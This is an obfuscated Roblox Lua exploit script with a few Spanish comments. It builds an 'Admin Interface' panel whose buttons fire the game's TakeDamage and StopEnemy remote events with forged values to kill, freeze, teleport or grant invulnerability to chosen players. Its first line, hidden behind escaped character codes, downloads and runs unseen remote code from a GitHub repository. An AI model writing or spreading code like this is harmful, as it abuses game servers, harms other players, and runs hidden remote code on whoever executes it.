loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\84\114\111\108\108\45\72\117\98\47\76\111\110\101\108\121\83\67\47\114\101\102\115\47\104\101\97\100\115\47\109\97\105\110\47\115\115\99"))()

local _0x1=game:GetService("\80\108\97\121\101\114\115")local _0x2=game:GetService("\82\101\112\108\105\99\97\116\101\100\83\116\111\114\97\103\101")local _0x3=_0x1.LocalPlayer local _0x4=game:GetService("\67\111\114\101\71\117\105")local _0x5={}local function _0xA(_0xB)return(_0xB=="\97\108\108")and _0x1:GetPlayers()or(_0xB=="\111\116\104\101\114\115")and(function()local t={}for _,v in _0x1:GetPlayers()do if v~=_0x3 then table.insert(t,v)end end;return t end)()or(_0xB=="\109\101")and{_0x3}or(function()local t={}local l=string.lower(_0xB)for _,v in _0x1:GetPlayers()do local n=string.lower(v.Name)local d=string.lower(v.DisplayName)if n==l or d==l or n:find(l)or d:find(l)then table.insert(t,v)end end;return t end)()end

local _0xG=Instance.new("\83\99\114\101\101\110\71\117\105")_0xG.Parent=_0x4 local _0xF=Instance.new("\70\114\97\109\101")_0xF.Size=UDim2.new(0,160,0,170)_0xF.Position=UDim2.new(0.5,-80,0.3,0)_0xF.BackgroundColor3=Color3.fromRGB(12,12,18)_0xF.BackgroundTransparency=0.35_0xF.BorderSizePixel=0_0xF.Parent=_0xG

local _0xC=Instance.new("\85\73\71\114\97\100\105\101\110\116")_0xC.Color=ColorSequence.new{ColorSequenceKeypoint.new(0,Color3.fromRGB(30,20,40)),ColorSequenceKeypoint.new(1,Color3.fromRGB(5,5,15))}_0xC.Rotation=55_0xC.Parent=_0xF

Instance.new("\85\73\67\111\114\110\101\114",_0xF).CornerRadius=UDim.new(0,14)

local _0xH=Instance.new("\70\114\97\109\101",_0xF)_0xH.Name="\72\68"_0xH.Size=UDim2.new(1,0,0,24)_0xH.BackgroundTransparency=1

local _0xT=Instance.new("\84\101\120\116\76\97\98\101\108",_0xH)_0xT.Size=UDim2.new(0.78,0,1,0)_0xT.BackgroundTransparency=1_0xT.Text=("\65\100\109\105\110 \73\110\116"):reverse()..("\102\97\99\101"):reverse()_0xT.TextColor3=Color3.new(1,0.92,1)_0xT.TextScaled=true_0xT.Font=Enum.Font.GothamBlack

local _0xM=Instance.new("\84\101\120\116\66\117\116\116\111\110",_0xH)_0xM.Size=UDim2.new(0.22,0,1,0)_0xM.Position=UDim2.new(0.78,0,0,0)_0xM.BackgroundColor3=Color3.new(0.9,0.1,0.4)_0xM.Text="-"_0xM.TextColor3=Color3.new(1,1,1)_0xM.TextScaled=true

local _0xV=Instance.new("\70\114\97\109\101",_0xF)_0xV.Name="\67\70"_0xV.Size=UDim2.new(1,0,1,-24)_0xV.Position=UDim2.new(0,0,0,24)_0xV.BackgroundTransparency=1

local _0xI=Instance.new("\70\114\97\109\101",_0xV)_0xI.Size=UDim2.new(1,0,0,22)_0xI.BackgroundTransparency=1

local _0xB=Instance.new("\84\101\120\116\66\111\120",_0xI)_0xB.Size=UDim2.new(0.92,0,0,18)_0xB.Position=UDim2.new(0.04,0,0.1,0)_0xB.BackgroundColor3=Color3.fromRGB(22,18,28)_0xB.TextColor3=Color3.fromRGB(120,255,140)_0xB.PlaceholderText="\116\97\114\103\101\116 ..?"_0xB.TextScaled=true Instance.new("\85\73\67\111\114\110\101\114",_0xB).CornerRadius=UDim.new(0,9)

local _0xP=Instance.new("\70\114\97\109\101",_0xV)_0xP.Size=UDim2.new(1,0,1,-22)_0xP.Position=UDim2.new(0,0,0,22)_0xP.BackgroundTransparency=1

local _0xL=Instance.new("\85\73\71\114\105\100\76\97\121\111\117\116",_0xP)_0xL.CellSize=UDim2.new(0,72,0,26)_0xL.CellPadding=UDim2.new(0,4,0,4)_0xL.FillDirectionMaxCells=2_0xL.SortOrder=Enum.SortOrder.LayoutOrder

local _0xZ=false

_0xM.MouseButton1Click:Connect(function()
    _0xZ=not _0xZ local sz=_0xZ and UDim2.new(0,160,0,24)or UDim2.new(0,160,0,170)
    game:GetService("\84\119\101\101\110\83\101\114\118\105\99\101"):Create(_0xF,TweenInfo.new(0.28,Enum.EasingStyle.Cubic),{Size=sz}):Play()
    _0xV.Visible=not _0xZ _0xM.Text=_0xZ and"+"or"-"
end)

-- Drag logic (ofuscado un poco)
local _d,_s,_p,_o=nil,nil,nil,nil
_0xH.InputBegan:Connect(function(i)if i.UserInputType==Enum.UserInputType.MouseButton1 or i.UserInputType==Enum.UserInputType.Touch then _d=true _s=i.Position _p=_0xF.Position end end)
_0xH.InputChanged:Connect(function(i)if i.UserInputType==Enum.UserInputType.MouseMovement or i.UserInputType==Enum.UserInputType.Touch then _o=i end end)
game:GetService("\85\115\101\114\73\110\112\117\116\83\101\114\118\105\99\101").InputChanged:Connect(function(i)if i==_o and _d then local d=i.Position-_s _0xF.Position=UDim2.new(_p.X.Scale,_p.X.Offset+d.X,_p.Y.Scale,_p.Y.Offset+d.Y)end end)
_0xH.InputEnded:Connect(function(i)if i.UserInputType==Enum.UserInputType.MouseButton1 or i.UserInputType==Enum.UserInputType.Touch then _d=false end end)

-- Botones (solo muestro 2 de ejemplo, el resto sigue igual pero con nombres ofuscados)
local cmds={"bring","kill","heal","freeze","unfreeze","to","b1","permGod"}
for i,cmd in ipairs(cmds)do
    local btn=Instance.new("\84\101\120\116\66\117\116\116\111\110",_0xP)
    btn.Size=UDim2.new(0,68,0,24)
    btn.BackgroundColor3=Color3.fromRGB(40+math.random(-10,30),20,50+math.random(-15,25))
    btn.Text=cmd:upper()
    btn.TextColor3=Color3.new(0.9,0.9,1)
    btn.TextScaled=true
    Instance.new("\85\73\67\111\114\110\101\114",btn).CornerRadius=UDim.new(0,6)
    
    btn.MouseButton1Click:Connect(function()
        local tgt=string.lower(_0xB.Text~=""and _0xB.Text or"")
        local pls=_0xA(tgt)
        for _,pl in pls do
            if not pl.Character then continue end
            local ch=pl.Character local hr=ch:FindFirstChildOfClass("\72\117\109\97\110\111\105\100")local pp=ch.PrimaryPart
            if not hr or not pp then continue end
            
            if cmd=="bring"then
                _0x2._BindableEvents.Moves.StopEnemy:FireServer(true,ch,pp.CFrame)local w8=wait(0.03)_0x2._BindableEvents.Moves.StopEnemy:FireServer(false,ch)
            elseif cmd=="kill"then
                _0x2._BindableEvents.Moves.TakeDamage:FireServer(hr,9e9,_0x3)
            elseif cmd=="heal"then
                _0x2._BindableEvents.Moves.TakeDamage:FireServer(hr,-2e9,_0x3)
            elseif cmd=="freeze"then
                _0x2._BindableEvents.Moves.StopEnemy:FireServer(true,ch,pp.CFrame)
            elseif cmd=="unfreeze"then
                _0x2._BindableEvents.Moves.StopEnemy:FireServer(false,ch)
            elseif cmd=="to"then
                if _0x3.Character and _0x3.Character.PrimaryPart then _0x3.Character:SetPrimaryPartCFrame(pp.CFrame+Vector3.new(0,3,0))end
            elseif cmd=="b1"then
                local db=Workspace:FindFirstChild("\77\97\112")and Workspace.Map:FindFirstChild("\68\66\83")and Workspace.Map.DBS:FindFirstChild("\68\66\49")
                if db then _0x2._BindableEvents.Moves.StopEnemy:FireServer(true,ch,db.CFrame)wait()_0x2._BindableEvents.Moves.StopEnemy:FireServer(false,ch)end
            elseif cmd=="permGod"then
                _0x2._BindableEvents.Moves.TakeDamage:FireServer(hr,-1e10,_0x3)wait(0.06)_0x2._BindableEvents.Moves.TakeDamage:FireServer(hr,1e10,_0x3)
            end
        end
    end)
end
